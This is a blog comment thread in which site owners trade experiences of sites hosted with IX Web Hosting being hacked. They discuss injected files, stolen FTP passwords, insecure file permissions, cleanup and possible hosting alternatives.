    @Brent – Do you have a link to the page that supposedly caused the “malicious site” warning? I went to the main page and received no warnings from my anti-virus program. If your site is infected, it is better to find it before Google does. Once Google flags your site, it could take up to 90 days to get that flag removed after the site has been cleaned up. You would have to jump through a bunch of hoops to get them to remove the flag from your site…

    I really don’t know how Google operates. I would be surprised if they relied solely on the IP address though, since it doesn’t take much to move a site to a new server with a new IP address. I imagine that once a site has been flagged, the flag follows the domain name, not the IP address. Or it may even follow both for all I know. Once a site has been flagged, it is a real PITA to get it unflagged as you found…


  44. Brent Crouch Says:

    I never got a warning when I visited the home page of the site either. However, someone changed my index.php file yesterday as well as uploaded an index.html file to another directory it didn’t belong into. I was able to sort all my files by date and then replace the files that were infected. Interesting thing, they files were somehow locked down. When I downloaded the infected file, I was unable to open on my laptop. I kept getting a message stating I needed to have admin access to view it. The account I use has admin privileges.

    What is the most frustrating is figuring out how someone got access. I am using the most recent version of a popular shopping cart. All the folders are set to the correct permissions. It’s a real pain to figure out what happened. For now, I’m just going to monitor the file changes each day.


  45. Brent Crouch Says:

    @Nightrider – Thanks for sharing. That’s good info.

    One thing I’ve never understood. I’ve always heard leaving a folder as 777 would allow anyone to upload to it. But how do you upload without an FTP password?


  46. Nightrider Says:

    @Brent – when a hacker gains full access to your site, they can change the ownership of the files to prevent you from undoing what they did. I imagine that’s why you had so much trouble with the file. However, when you downloaded it to your PC, you should have had full access to the file. I don’t know of any reason why you wouldn’t…

    Your site can be hacked even if you are doing everything correctly. As in the case with IX, I am fairly confident that the problem lies with the IX security. You can have the best secured site on the Internet, but if your Host’s servers are not secure, then your site security is worthless. You are at the mercy of your host’s security, so you really have to hope that they are on the ball too…

    It’s not that difficult to write a utility that will allow you to upload a file from one server to another. If the destination folder permissions are set to 777, there is no impediment to uploading content to the folder. If file permissions are set to 666, there is nothing to prevent a hacker from writing to the file from one server to the next. If a hacker can upload a utility to a folder, then (s)he can use that utility to write to files and upload to folders where the permissions are set to 644 and 755. All they need to do is change permissions and make the changes. While they are at it, they can change ownership of everything to make it harder for you to undo what they have done…

    And if you ever create a Virtual FTP Directory and give it full privileges, then that’s the same as opening up everything in that directory, including subfolders, to the world. So if you are forced to create a Virtual FTP Directory, when you are done using it, immediately delete it to resecure your site…


  47. Jade Says:

    Hello everyone. Before you get too angry at IX I have to say that I’d never even heard of them until I got hacked. I’m a web designer and 3 sites I was working on got the injection code: on 3 different hosts on the same day at the same time! The thing is, other sites I have weren’t hacked. The one thing those 3 sites had in common was I had been working on them recently. 2 of the sites are on the same webhost, yet only the one I worked on the same week was hacked. There was only 1 common denomenator between the sites: me.

    I originally thought it was my FTP program until I noticed the dozens of sites not compromised, but I hadn’t been working on them. I didn’t upload or even open my FTP program and they got injected a few days later. I changed passwords and so far haven’t been reaffected.

    This tells me a couple of things:
    1) It isn’t likely a server issue since something running on the server doesn’t need your login info. A password change wouldn’t matter
    2) My usernames and passwords were “sent somewhere” from my machine (the only place all of them could have been gotten), but only when I accessed the sites.

    I also had a virus the week this happened, and suspect whatever this is got on my machine and started monitoring FTP accesses. So if this is actually what’s happening, changing webhosts won’t solve it as you’ll still be FTP-ing from the same infected machine.

    If someone has changed webhosts and hasn’t had the problem since without changing their home machine I’d like to hear about it. It is possible that all 3 web hosts were hacked at the same time, although I think it’s unlikely. Especially since I saw a blog describing the same thing I am. Google “tmp_lkojfghx” to see what I mean. That’s how I got here.

    Jade


  48. Brent Crouch Says:

    Jade – It is an IX Web issue. They have admitted as much. Your individual case may have been caused by a virus on your computer, but the hundreds of people reporting a problem with IX are due to problems with IX servers.


  49. Nightrider Says:

    Jade, I offer tech support to hundreds of sites hosted with many different hosts. As a result, I am often asked to help whenever someone’s site gets hacked. This past year, all the attacks that I have helped to clean up seem to have been exclusively on IX Webhosting sites. I don’t know if this is a disgruntled employee or someone who has found a way to gain easy access to insecure IX servers or what, but it sure seems to be an IX problem either way…

    Lately, I have been getting better service from IX Tech Support. Perhaps they have realized that I won’t tolerate their endless excuses and apologies and have decided the only way to get me off of their back is to actually fix something instead of passing the blame. My site seems to be running a lot more stable this last few weeks, knock on wood…

    I have found ONE great techie employed at IX Webhosting named Arthur Riskal. If you are unfortunate enough to have to contact IX Tech support, hopefully Arthur Riskal will be the one who happens to help you. He solved several IX related problems on my site that all other IX support staff continued to try to blame on my code. Arthur went above and beyond the call of duty to uncover and fix these long term problems. Right now, he is the only Techie at IX Webhosting that I trust to really help out…


  50. Erik Says:

    What are people seeing as far as FTP transfer speeds? Both down and up are much slower than I’ve experienced with other hosts.

    Also, while all of my sites mysteriously had those *.php files in their root one day, I have not seen any ill effect on my sites. This may be because I’m on a Windows server (all of my sites are either .NET or static HTML).

    I’ve been looking around in case I need to jump ship, and the best I’ve found (for us on the Microsoft side of the pond anyway) is Arvixe Web Hosting (http://www.arvixe.com). Anyone had any experience with them? They seem quite good – but I guess that’s what I thought of IX.

    Erik


  51. Nightrider Says:

    One of the nice things about IX servers is that there is no limit to the number of simultaneous connections to the server. Since I use SmartFtp to access the server, I can increase the number of workers uploading/downloading from the site, which greatly decreases the transfer times. Most hosts only allow up to 4 simultaneous connections at once, so this is an instance where IX excels over most other shared hosts that I deal with…


  52. DEE Says:

    Just wanted to add my two bob’sworth. I switched over to another host when my FTP pw was compromised. Of course, as with everyone else, it was MY FAULT. Needed a more difficult password, change it regularly. I had my suspicions. So get this: After switching hosts andbasically abandoning my IX account, I get an email yesterday advising my FTP pw was again compromised. It’s just weird, because I’m not using the account at all.


  53. DEE Says:

    Oh, and speed of upload and file manager is ridiculously slow.


  54. Alex Says:

    IX Web is what one gets for cheap end hosting, the server is relatively slow, and they are hacked often, of the websites I host with them the hack is always from webshell ( 127.0.0.1 ) so blame does lie with them on that count. ( And yes they never admit to it, same cr@p is given, trojan, keylogger etc. ) Fine for sites you check regularly wouldn’t host a site with them unless you are checking for changes via ftp at least once a week, as you will eventually get hacked by there own server. ( This problem is not unique to IX and have encountered before on 2 other hosts I have used. )

    My verdict fine for beginners and single sites, multiple site hosting I would look elsewhere.


  55. siraj khan Says:

    Ohh my god,

    for past 2 year i makes website through open source, i m not a coder or programme, every time they suspended my a/c, i think it is my mistake & how ix give me security to hacking, if i don’t know how to prevent scam,

    But now i know after reading people who hosted site at ix & also programmer too, that it was big mistake by ix.

    well, once i able to learn programming & ix appear that time, certainly hack them till 2 year continuously & till they shut off the operation.

    deleted my valuable data & info i collect in 2 years.

    I think hackers behind it also affcted by their services & ge revenge


  56. Jim Guy Says:

    Ya if your hosting company cant provide some form of security(and it is reasonable to think they cant) then websites really should be required to get a security audit which should highlight any vulnerabilities, http://www.websafe.ie was a good free/paid offer but there are other more enterprise products.


  57. evilix Says:

    IX Web Hosting is a very not bad but evil hosting. They are very unhonest and if you

    want to break your business stay with them. The downtimes are many, everyday and the

    attention you get is like the chicks to the foxes. The maximum you get are pattern

    robots answers.

    You find in the web hundreds of complaints against them, but they spend much money in

    paid fake pages that recommend them.
    Why is not this millions invested in the quality of their services?

    Evilix – January, 10, 2012

Leave a Reply